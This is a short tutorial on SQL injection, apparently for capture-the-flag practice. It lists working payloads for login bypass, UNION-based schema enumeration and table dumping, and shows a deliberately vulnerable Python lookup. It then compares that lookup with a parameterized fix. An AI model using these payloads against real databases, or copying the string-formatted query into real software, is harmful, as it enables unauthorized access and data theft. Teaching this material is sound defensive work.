SQL Injection
SQL Injection (SQLi) occurs when user input is concatenated directly into a SQL query string, so that characters in the input (such as quotes and comment markers) change the structure of the query instead of being treated as data. In CTFs, this often exposes login bypasses or flag tables within databases.
| Task | Example |
|---|---|
| Test for boolean login bypass | ' OR 1=1 -- |
| Enumerate databases | ' UNION SELECT schema_name FROM information_schema.schemata -- |
| Identify columns via error-based strategy | ' ORDER BY 5 -- |
| Dump table contents | ' UNION SELECT column1, column2 FROM users -- |
```python
import sqlite3

def get_user(username):
    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()
    # Vulnerable: the raw username is formatted straight into the SQL text,
    # so a quote in the input closes the string literal and the rest is parsed as SQL.
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchall()
```
Inject input:

```
' OR 1=1 --
```

Resulting query:

```sql
SELECT * FROM users WHERE username = '' OR 1=1 --'
```
The leading quote closes the empty string literal, `OR 1=1` makes the WHERE clause true for every row, and `--` turns the trailing quote into a comment. The query therefore returns all rows, granting unintended access.
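To show the fix next to the flaw, here is an added, self-contained example (not code from the original page): the page's string-formatted lookup beside a parameterized version, both run against a constructed in-memory SQLite table. The table contents and function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration (not from any real system).
SAMPLE_USERS = [("alice", "hash-a"), ("bob", "hash-b"), ("carol", "hash-c")]


def make_db():
    """Build an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def get_user_vulnerable(conn, username):
    """Same pattern as the page's get_user: string formatting builds the
    query text, so quotes and comment markers in `username` alter the SQL."""
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query).fetchall()]


def get_user_safe(conn, username):
    """Hardened form: the ? placeholder makes the driver bind `username`
    as a value, so it can only ever be compared against stored usernames."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,)).fetchall()]


def compare(username):
    """Run both forms on fresh data; return (vulnerable_rows, safe_rows)."""
    conn = make_db()
    try:
        return get_user_vulnerable(conn, username), get_user_safe(conn, username)
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("alice", "' OR 1=1 --"):
        vuln, safe = compare(value)
        print(f"{value!r}: vulnerable -> {vuln}, parameterized -> {safe}")
```

With the legitimate input both functions return the single matching row; with the page's payload the formatted query returns every row while the parameterized query returns nothing, because the bound value never reaches the SQL parser as code. Parameterization (or an ORM that parameterizes for you) is the primary mitigation; input filtering alone does not remove the underlying defect.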